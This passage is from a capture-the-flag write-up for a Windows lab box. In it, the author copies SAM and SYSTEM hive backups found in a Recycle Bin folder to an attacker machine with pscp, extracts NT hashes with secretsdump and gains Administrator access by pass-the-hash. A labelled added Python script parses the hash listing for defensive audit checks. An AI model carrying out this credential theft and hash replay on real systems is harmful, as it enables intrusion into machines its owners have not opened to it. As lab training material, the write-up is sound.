*Evil-WinRM* PS C:\> dir -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 2:14 AM $Recycle.Bin
d--hsl 9/17/2020 7:27 PM Documents and Settings
d----- 9/18/2020 2:04 AM PerfLogs
d-r--- 9/17/2020 7:39 PM Program Files
d----- 9/17/2020 7:39 PM Program Files (x86)
d--h-- 9/18/2020 2:04 AM ProgramData
d--hs- 9/17/2020 7:27 PM Recovery
d--hs- 9/17/2020 7:26 PM System Volume Information
d-r--- 9/18/2020 2:14 AM Users
d----- 11/13/2020 10:33 PM Windows
d----- 9/17/2020 8:18 PM xampp
-a-hs- 11/16/2020 8:56 PM 1207959552 pagefile.sys
To cd into it we must put the ‘$’ in quotes, otherwise PowerShell would try to expand $Recycle as a variable
*Evil-WinRM* PS C:\> cd c:\"$"Recycle.Bin
*Evil-WinRM* PS C:\$Recycle.Bin> dir -Force
Directory: C:\$Recycle.Bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 9/18/2020 7:28 PM S-1-5-21-1987495829-1628902820-919763334-1001
d--hs- 11/13/2020 10:41 PM S-1-5-21-1987495829-1628902820-919763334-500
Now we can go into the user folder under here, we don’t have access to ‘…-500’, that’s probably the Administrator account, but we can access ‘…-1001’
*Evil-WinRM* PS C:\$Recycle.Bin> cd S-1-5-21-1987495829-1628902820-919763334-1001
*Evil-WinRM* PS C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001> dir -force
Directory: C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 9/18/2020 2:14 AM 129 desktop.ini
-a---- 9/18/2020 7:28 PM 49152 sam.bak
-a---- 9/18/2020 7:28 PM 17457152 system.bak
Ok, we find a SAM backup file and another interesting backup, system.bak (the SYSTEM hive, which holds the boot key needed to decrypt the SAM). These should/could contain creds for us, so let’s grab them both. We’ll use pscp from the putty suite for this
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\pscp -P 22 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b:ab:04:68 -pw ********* sam.bak kali@10.9.5.160:/home/kali/Documents/TryHackMe/YearOfTheOwl/.
sam.bak | 4 kB | 4.0 kB/s | ETA: 00:00:11 | 8%
sam.bak | 48 kB | 48.0 kB/s | ETA: 00:00:00 | 100%
*Evil-WinRM* PS C:\Users\Jareth\Desktop> .\pscp -P 22 -hostkey 23:c1:0b:a2:67:12:09:91:ae:57:d3:bf:0b:ab:04:68 -pw ********* system.bak kali@10.9.5.160:/home/kali/Documents/TryHackMe/YearOfTheOwl/.
system.bak | 4 kB | 4.0 kB/s | ETA: 01:11:01 | 0%
system.bak | 352 kB | 352.0 kB/s | ETA: 00:00:47 | 2%
system.bak | 7624 kB | 3812.0 kB/s | ETA: 00:00:02 | 44%
system.bak | 17048 kB | 8524.0 kB/s | ETA: 00:00:00 | 100%
Now we can use impacket’s secretsdump.py to dump the local SAM hashes offline from the two files
kali@kali:~/Tools/impacket/examples$ ./secretsdump.py -sam ~/Documents/TryHackMe/YearOfTheOwl/sam.bak -system ~/Documents/TryHackMe/YearOfTheOwl/system.bak LOCAL
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xd676472afd9cc13ac271e26890b87a8c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
[*] Cleaning up...
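The secretsdump listing and the $Recycle.Bin folder names seen earlier both expose the account RIDs, so the two can be tied together. As an added example (not from the write-up or from impacket), this script parses the `uid:rid:lmhash:nthash` lines above, confirms which SID folder belongs to which account (RID 1001 is Jareth, RID 500 the built-in Administrator) and summarises what a defender would check in such a listing: whether LM hash storage is off and whether any account carries the NT hash of an empty password.

```python
"""Relate a secretsdump-style SAM listing to per-user $Recycle.Bin folders.

Added example, not from the write-up or from impacket. The sample input is
constructed from the secretsdump lines and the two SID folder names quoted
above; hashes are only compared against the well-known "empty" constants.
"""

# Constructed sample: the secretsdump output lines quoted above.
SAM_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6bc99ede9edcfecf9662fb0c0ddcfa7a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:39a21b273f0cfd3d1541695564b4511b:::
Jareth:1001:aad3b435b51404eeaad3b435b51404ee:5a6103a83d2a94be8fd17161dfd4555a:::
"""

# Constructed sample: the folder names listed under C:\$Recycle.Bin above.
RECYCLE_BIN_SIDS = [
    "S-1-5-21-1987495829-1628902820-919763334-1001",
    "S-1-5-21-1987495829-1628902820-919763334-500",
]

# LM hash of an empty string: present for every account when LM storage is disabled.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Well-known relative identifiers of local built-in accounts.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 503: "DefaultAccount", 504: "WDAGUtilityAccount"}


def parse_sam_dump(text: str) -> list:
    """Parse `user:rid:lmhash:nthash:::` lines into dicts, skipping status lines."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # "[*] Dumping ..." and blank lines are not account records
        accounts.append({"user": parts[0], "rid": int(parts[1]),
                         "lm": parts[2].lower(), "nt": parts[3].lower()})
    return accounts


def rid_from_sid(sid: str) -> int:
    """The RID is the last sub-authority of a SID string."""
    return int(sid.rsplit("-", 1)[1])


def owner_of_recycle_folder(sid: str, accounts: list) -> str:
    """Match a $Recycle.Bin\\S-1-5-21-... folder to the account with the same RID.

    Falls back to the well-known RID table, then to "unknown".
    """
    rid = rid_from_sid(sid)
    for acct in accounts:
        if acct["rid"] == rid:
            return acct["user"]
    return WELL_KNOWN_RIDS.get(rid, "unknown")


def audit_accounts(accounts: list) -> dict:
    """Summarise the checks a defender would run over a SAM listing."""
    return {
        "lm_storage_disabled": all(a["lm"] == EMPTY_LM_HASH for a in accounts),
        "empty_password_accounts": sorted(a["user"] for a in accounts if a["nt"] == EMPTY_NT_HASH),
        "local_admin_rid_500": next((a["user"] for a in accounts if a["rid"] == 500), None),
        "user_accounts": sorted(a["user"] for a in accounts if a["rid"] >= 1000),
    }


if __name__ == "__main__":
    accts = parse_sam_dump(SAM_DUMP)
    for sid in RECYCLE_BIN_SIDS:
        print(f"{sid} -> {owner_of_recycle_folder(sid, accts)}")
    for key, value in audit_accounts(accts).items():
        print(f"{key}: {value}")
```

Guest and DefaultAccount showing the empty-password hash is normal for those disabled built-ins; the finding that matters on a real host is a RID 1000+ account in that list.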
Now we can use evil-winrm again to log in with the Administrator NT hash instead of a password (pass-the-hash); luckily we don’t need to crack it, as I tried that without success!
kali@kali:~/Documents/TryHackMe/YearOfTheOwl$ ~/Tools/evil-winrm/evil-winrm.rb -u Administrator -H 6bc99ede9edcfecf9662fb0c0ddcfa7a -i 10.10.162.177
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2020 2:19 AM 80 admin.txt
Excellent, now let’s grab that root flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type admin.txt
THM{REDACTED}
We got it, #2:THM{REDACTED}